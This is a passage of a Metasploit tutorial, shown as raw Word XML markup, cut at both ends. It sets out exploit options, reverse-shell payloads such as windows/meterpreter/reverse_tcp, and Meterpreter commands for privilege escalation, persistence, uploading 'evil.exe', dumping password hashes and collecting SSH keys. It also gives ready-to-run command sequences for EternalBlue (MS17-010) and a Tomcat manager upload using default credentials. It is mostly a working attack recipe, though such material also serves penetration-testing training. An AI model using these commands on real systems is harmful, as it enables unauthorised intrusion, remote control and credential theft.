          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show all configurable options for this module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show targets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show available target operating systems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show advanced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show advanced options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Required Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every exploit has required options. These are the most common:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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44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Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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44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dxa" w:w="4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44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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RHOSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set RHOSTS 192.168.1.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target IP or range (192.168.1.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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set RPORT 445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target port (usually auto-filled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LHOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set LHOST 192.168.1.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Your IP for reverse shell callback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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set LPORT 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Your listening port for reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">THREADS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set THREADS 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">For scanners - how many parallel threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">USERNAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0D0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set USERNAME admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">For brute force modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PASSWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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set PASSWORD pass123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">For brute force modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="FFD700" w:sz="6"/>
        </w:pBdr>
        <w:shd w:fill="1A1A00" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FFD700"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: Use 'ip addr' or 'ifconfig' in a separate terminal to find your LHOST IP. On Kali it is usually your eth0 or tun0 (VPN) address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 - Choose a Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A payload is what runs on the target after the exploit succeeds. Not all exploits need a separate payload set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">View Available Payloads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show payloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # list all compatible payloads for current module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Payloads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44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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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44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windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Meterpreter - most powerful Windows shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0D0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windows/shell/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic Windows command shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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linux/x86/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux Meterpreter shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0D0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linux/x64/shell/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic Linux shell (64-bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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java/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Java Meterpreter (cross platform)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0D0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php/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PHP Meterpreter (web servers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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windows/meterpreter/reverse_https</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter over HTTPS (harder to detect)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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0D0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generic/shell_reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="48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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Generic shell - works on many platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Set and Run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set PAYLOAD windows/meterpreter/reverse_tcp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set LHOST 192.168.1.10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set LPORT 4444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run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # launch the exploit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exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # same as run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check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # check if target is vulnerable without exploiting (if supported)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 - Meterpreter Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have a Meterpreter session, these commands run on the target:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">System Information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sysinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show target OS, hostname, architecture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getuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show current user you are running as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getpid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show current process ID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ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # list all running processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigation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pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show current directory on target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ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # list files in current directory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cd C:\\Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # change directory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download file.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # download a file from target to your machine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upload evil.exe C:\\Temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # upload a file to the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation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getuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # check current privileges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getsystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # attempt to elevate to SYSTEM/root automatically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use post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find local privilege escalation exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence and Pivoting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background</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # send session to background, return to msf prompt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sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # list all active sessions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sessions -i 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # interact with session number 1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shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # drop into a native OS shell from Meterpreter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run post/windows/manage/persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # install persistence on Windows target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping Credentials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hashdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # dump Windows password hashes (requires SYSTEM)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run post/windows/gather/credentials/credential_collector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # collect stored credentials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run post/multi/gather/ssh_creds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # collect SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 - Common Exploit Examples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">EternalBlue - MS17-010 (Windows SMB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: Windows 7, Windows Server 2008 R2 - unpatched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use exploit/windows/smb/ms17_010_eternalblue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set RHOSTS 192.168.1.50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set LHOST 192.168.1.10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set PAYLOAD windows/x64/meterpreter/reverse_tcp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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Tomcat Manager Upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: Tomcat with default/weak credentials on manager app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use exploit/multi/http/tomcat_mgr_upload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set RHOSTS 192.168.1.50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set RPORT 8080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set HttpUsername tomcat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set HttpPassword tomcat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set LHOST 192.168.1.10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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
